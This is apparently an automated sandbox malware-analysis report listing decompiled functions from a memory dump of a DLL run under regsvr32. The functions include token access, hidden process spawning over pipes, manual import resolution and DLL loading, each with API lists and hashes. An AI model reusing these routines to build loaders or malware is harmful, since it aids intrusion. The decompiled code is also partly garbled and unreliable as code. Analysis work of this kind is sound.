				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E6CB0E3F8(_t3);
				_t7 = _t29 + 0x220; // 0xd407b0
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E6CB0E433(_t7);
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

0x6cb0cfc9
0x6cb0cfcb
0x6cb0cfd2
0x6cb0cfda
0x6cb0cfe4
0x6cb0cfe4
0x6cb0cfea
0x6cb0cff3
0x6cb0cff9
0x6cb0cffb
0x6cb0cfff
0x6cb0cfff
0x6cb0d004
0x6cb0d00a
0x6cb0d01a
0x6cb0d024
0x6cb0d02c
0x6cb0d02f
0x6cb0d03b
0x6cb0d041
0x6cb0d046
0x6cb0d04c
0x6cb0d052
0x6cb0d058
0x6cb0d060

APIs

GetCurrentProcess.KERNEL32(?,?,00D40590,?,6CB03538), ref: 6CB0CFD2
GetModuleFileNameW.KERNEL32(00000000,00D41BD4,00000105,?,?,00D40590,?,6CB03538), ref: 6CB0CFF3
memset.MSVCRT ref: 6CB0D024
GetVersionExA.KERNEL32(00D40590,00D40590,?,6CB03538), ref: 6CB0D02F
GetCurrentProcessId.KERNEL32(?,6CB03538), ref: 6CB0D035

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: cb52368d9e6b3efdf463fb59cf80fd1bae37608abe730b3d67061b187188980d
Instruction ID: d5148a4402fa3a9304b588e2e37934e1d723bd44de6e296349e693b9b43ae9d1
Opcode Fuzzy Hash: cb52368d9e6b3efdf463fb59cf80fd1bae37608abe730b3d67061b187188980d
Instruction Fuzzy Hash: 4F014C70A01B849FDB209F70884EADE7BE9FB85310F01081EE59687680EB756645CA95

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0B988, Relevance: 7.5, APIs: 5, Instructions: 32
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6CB0B988(void* __ecx) {
				void* _v8;
				void* _t9;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0 || GetLastError() == 0x3f0 && OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					_t9 = _v8;
				} else {
					_t9 = 0;
				}
				return _t9;
			}

0x6cb0b9a7
0x6cb0b9d4
0x6cb0b9d0
0x6cb0b9d0
0x6cb0b9d0
0x6cb0b9d9

APIs

GetCurrentThread.KERNEL32(00000008,00000000,6CB00000,00000000,?,?,6CB0BABE,74EC17D9,6CB00000), ref: 6CB0B99B
OpenThreadToken.ADVAPI32(00000000,?,?,6CB0BABE,74EC17D9,6CB00000), ref: 6CB0B9A2
GetLastError.KERNEL32(?,?,6CB0BABE,74EC17D9,6CB00000), ref: 6CB0B9A9
GetCurrentProcess.KERNEL32(00000008,6CB00000,?,?,6CB0BABE,74EC17D9,6CB00000), ref: 6CB0B9C2
OpenProcessToken.ADVAPI32(00000000,?,?,6CB0BABE,74EC17D9,6CB00000), ref: 6CB0B9C9

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken$ErrorLast
String ID:
API String ID: 102224034-0
Opcode ID: 61f30cd7683397c86cfcddc539e5630afce0a92204786d3927400416e4b2ddd9
Instruction ID: 250cdc5af86d6bcf5a97636a7498e061a40058d875788b1722e3189a4e8a42f0
Opcode Fuzzy Hash: 61f30cd7683397c86cfcddc539e5630afce0a92204786d3927400416e4b2ddd9
Instruction Fuzzy Hash: DFF0FE71744649AFEF009BA6880EF5A77BCFB05745F150556F642E3940D674AA008761

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0A9F9, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E6CB0A9F9(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E6CB085FB( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x6cb1e684; // 0xdbfaa0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x6cb1e684; // 0xdbfaa0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E6CB085E5(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x6cb1e684; // 0xdbfaa0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x6cb1e684; // 0xdbfaa0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x6cb1e684; // 0xdbfaa0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x6cb1e684; // 0xdbfaa0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E6CB09187(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E6CB09273(_t127);
						E6CB085FB( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E6CB0C3BB(_t127));
				_t98 =  *0x6cb1e68c; // 0xdbfc68
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x6cb1e684; // 0xdbfaa0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x6cb1e684; // 0xdbfaa0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E6CB09237(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E6CB085FB( &_v32, 0);
				return _t128;
			}

0x6cb0aa04
0x6cb0aa06
0x6cb0aa12
0x6cb0aa17
0x6cb0aa1a
0x6cb0aa1c
0x6cb0aa1f
0x6cb0aa22
0x6cb0aa29
0x6cb0aa2c
0x6cb0aa33
0x6cb0aa36
0x6cb0aa40
0x6cb0aa41
0x6cb0aa44
0x6cb0aa46
0x6cb0aa47
0x6cb0aa5e
0x6cb0abde
0x00000000
0x6cb0abde
0x6cb0aa75
0x6cb0abaa
0x6cb0abb0
0x6cb0abbb
0x6cb0abbd
0x6cb0abc5
0x6cb0abc5
0x6cb0abcc
0x6cb0abce
0x6cb0abd7
0x6cb0abd7
0x00000000
0x6cb0abda
0x6cb0aa7b
0x6cb0aa7e
0x6cb0aa81
0x6cb0aa87
0x6cb0aa91
0x6cb0aa9b
0x6cb0aaa2
0x6cb0aaab
0x6cb0aaad
0x6cb0aab3
0x00000000
0x00000000
0x6cb0aabe
0x6cb0aac5
0x6cb0aac6
0x6cb0aacb
0x6cb0aacc
0x6cb0aacd
0x6cb0aad2
0x6cb0aad4
0x6cb0aad5
0x6cb0aad6
0x6cb0aad9
0x6cb0aadf
0x00000000
0x00000000
0x6cb0aae5
0x6cb0aaed
0x6cb0aaf0
0x6cb0aaf8
0x6cb0aafb
0x6cb0aafe
0x6cb0ab04
0x6cb0ab18
0x6cb0ab1e
0x6cb0ab24
0x6cb0ab4d
0x6cb0ab26
0x6cb0ab26
0x6cb0ab28
0x6cb0ab2a
0x6cb0ab32
0x6cb0ab3a
0x6cb0ab3f
0x6cb0ab3f
0x6cb0ab53
0x6cb0ab55
0x6cb0ab55
0x6cb0ab5d
0x6cb0ab65
0x6cb0ab66
0x6cb0ab6b
0x6cb0ab74
0x6cb0ab94
0x6cb0ab94
0x6cb0ab9c
0x6cb0ab9f
0x6cb0aba7
0x00000000
0x6cb0aba7
0x6cb0ab7d
0x6cb0ab81
0x00000000
0x00000000
0x6cb0ab89
0x00000000

APIs

memset.MSVCRT ref: 6CB0AA36
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 6CB0AA5A
CreatePipe.KERNEL32(6CB0658A,?,0000000C,00000000), ref: 6CB0AA71

Part of subcall function 6CB085E5: HeapAlloc.KERNEL32(00000008,?,?,6CB08F65,00000100,?,6CB05FAC), ref: 6CB085F3

Part of subcall function 6CB085FB: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 6CB08641

Strings

D, xrefs: 6CB0AA91

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: CreateHeapPipe$AllocFreememset
String ID: D
API String ID: 488076629-2746444292
Opcode ID: e146d22138f5731de7374388b4b4228787a6478f7476b2942a61fb93d5463a1a
Instruction ID: 2c2c6080575eedde31522578125b3e45251967851ef9201d384c4f4d84914f22
Opcode Fuzzy Hash: e146d22138f5731de7374388b4b4228787a6478f7476b2942a61fb93d5463a1a
Instruction Fuzzy Hash: 0A511A71E00249AFDF01CFE4C845FDEBBB9EB08304F50456AE510E7650EB759A45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CB124D3, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6CB124D3(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E6CB0E0DB(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t34 = _v8 + 0xc; // 0xffff
						_v36 = LoadLibraryA( *_t34 + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_t43 = _v8 + 0x10; // 0xb8
								_v12 =  *_t43 + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_t73 = _v8 + 0x10; // 0xb8
									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										_t89 = _v8 + 0x10; // 0xb8
										 *( *_t89 + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x6cb124d9
0x6cb124e1
0x6cb124f6
0x6cb12508
0x6cb12514
0x6cb1251a
0x6cb1251f
0x6cb1252b
0x6cb12696
0x00000000
0x6cb12696
0x6cb12531
0x6cb1253a
0x6cb12548
0x6cb1254b
0x6cb1255a
0x6cb1255a
0x6cb12561
0x6cb1256f
0x6cb12572
0x6cb12582
0x6cb1258f
0x6cb12596
0x6cb125a6
0x6cb125b8
0x6cb125be
0x6cb125a8
0x6cb125b0
0x6cb125b0
0x6cb125c1
0x6cb125c5
0x6cb125d1
0x6cb125d5
0x6cb125d9
0x6cb125dd
0x6cb125e9
0x6cb12614
0x6cb1261c
0x6cb12622
0x6cb1262e
0x6cb1263a
0x6cb125eb
0x6cb125f0
0x6cb125fb
0x6cb12607
0x6cb12607
0x6cb12643
0x6cb12649
0x6cb12653
0x6cb1266f
0x6cb12655
0x6cb12658
0x6cb12664
0x6cb12664
0x6cb12653
0x6cb12677
0x6cb12680
0x6cb12680
0x6cb1268e
0x00000000
0x6cb1268e
0x6cb1259a
0x00000000
0x6cb1259a
0x00000000
0x6cb12572
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 6CB124F0
LoadLibraryA.KERNEL32(00000000), ref: 6CB12589

Strings

GetProcAddress, xrefs: 6CB124F9
kernel32.dll, xrefs: 6CB124EB

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: 12eff2d6fc093636e072dd6091972d6eca4339a5932f774eb09ce94230853bd7
Instruction ID: bd4b2813415ae9b90860c7a32c599507f8002f6728599d0eea28efaff254d562
Opcode Fuzzy Hash: 12eff2d6fc093636e072dd6091972d6eca4339a5932f774eb09ce94230853bd7
Instruction Fuzzy Hash: 42618B75E04249EFDB00CF98C485BADBBF1FF09319F208599E814AB6A1D734AA80CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0C510, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E6CB0C510(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x6cb1e688; // 0xd40590
				_t1 = _t50 + 0x1898; // 0x0
				_t14 =  *_t1;
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E6CB095C2(_t50, 0xb62);
					_t66 =  *0x6cb1e688; // 0xd40590
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E6CB09621( &_v140, 0x40, L"%08x", E6CB0D442(_t66 + 0xb0, E6CB0C3BB(_t66 + 0xb0), 0));
					_t20 =  *0x6cb1e688; // 0xd40590
					_t7 = _t20 + 0xa8; // 0x1
					asm("sbb eax, eax");
					_t25 = E6CB095C2(_t67, ( ~( *_t7) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x6cb1e688; // 0xd40590
					_t68 = E6CB092C6(_t26 + 0x1020);
					_v12 = _t68;
					E6CB085B6( &_v8);
					_t32 =  *0x6cb1e688; // 0xd40590
					_t34 = E6CB092C6(_t32 + 0x122a);
					 *0x6cb1e784 = _t34;
					_t35 =  *0x6cb1e684; // 0xdbfaa0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x6cb1e784);
					 *0x6cb1e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E6CB0E1B3(0x6cb1bb40, _t60);
					}
					 *0x6cb1e780 = _t38;
					E6CB085FB( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x6cb1e780 != 0) {
						goto L10;
					} else {
						E6CB085FB(0x6cb1e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x6cb1e780 == 0) {
						_t46 =  *0x6cb1e6bc; // 0xdbfbc8
						 *0x6cb1e780 = _t46;
					}
					L10:
					return 1;
				}
			}

0x6cb0c510
0x6cb0c510
0x6cb0c510
0x6cb0c513
0x6cb0c51f
0x6cb0c51f
0x6cb0c52a
0x6cb0c546
0x6cb0c54b
0x6cb0c554
0x6cb0c556
0x6cb0c55e
0x6cb0c57f
0x6cb0c584
0x6cb0c589
0x6cb0c591
0x6cb0c59c
0x6cb0c5a3
0x6cb0c5aa
0x6cb0c5bb
0x6cb0c5c1
0x6cb0c5c4
0x6cb0c5db
0x6cb0c5e7
0x6cb0c5ef
0x6cb0c5f6
0x6cb0c5fc
0x6cb0c608
0x6cb0c60e
0x6cb0c615
0x6cb0c628
0x6cb0c617
0x6cb0c617
0x6cb0c61a
0x6cb0c620
0x6cb0c625
0x6cb0c62a
0x6cb0c635
0x6cb0c647
0x6cb0c659
0x00000000
0x6cb0c65b
0x6cb0c662
0x00000000
0x6cb0c668
0x6cb0c669
0x6cb0c669
0x6cb0c670
0x6cb0c672
0x6cb0c677
0x6cb0c677
0x6cb0c67c
0x6cb0c680
0x6cb0c680

APIs

LoadLibraryW.KERNEL32 ref: 6CB0C608
memset.MSVCRT ref: 6CB0C647

Strings

%08x, xrefs: 6CB0C571
dll, xrefs: 6CB0C5CA

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: 4457418d33332e43a13bab83c9aef832e3ab8beb0bb8c66d76f36967febc3d1f
Instruction ID: da7a87b45171158971b9275082e64dcabf4bd76813aaf15b6eccace25b8c74be
Opcode Fuzzy Hash: 4457418d33332e43a13bab83c9aef832e3ab8beb0bb8c66d76f36967febc3d1f
Instruction Fuzzy Hash: 1B31D5B1B04284AFEB109B64DC4AF9E7BBCE75A358F604125F404D7E80DB749D44C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 6CB12DB0, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E6CB12DB0(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0xec8b55c3
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x23e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E6CB15DD0(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E6CB14B30(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x23e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E6CB14C70( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x7e89ffff
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0x3c468b3c
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x23e85000
							_a4 = _t219;
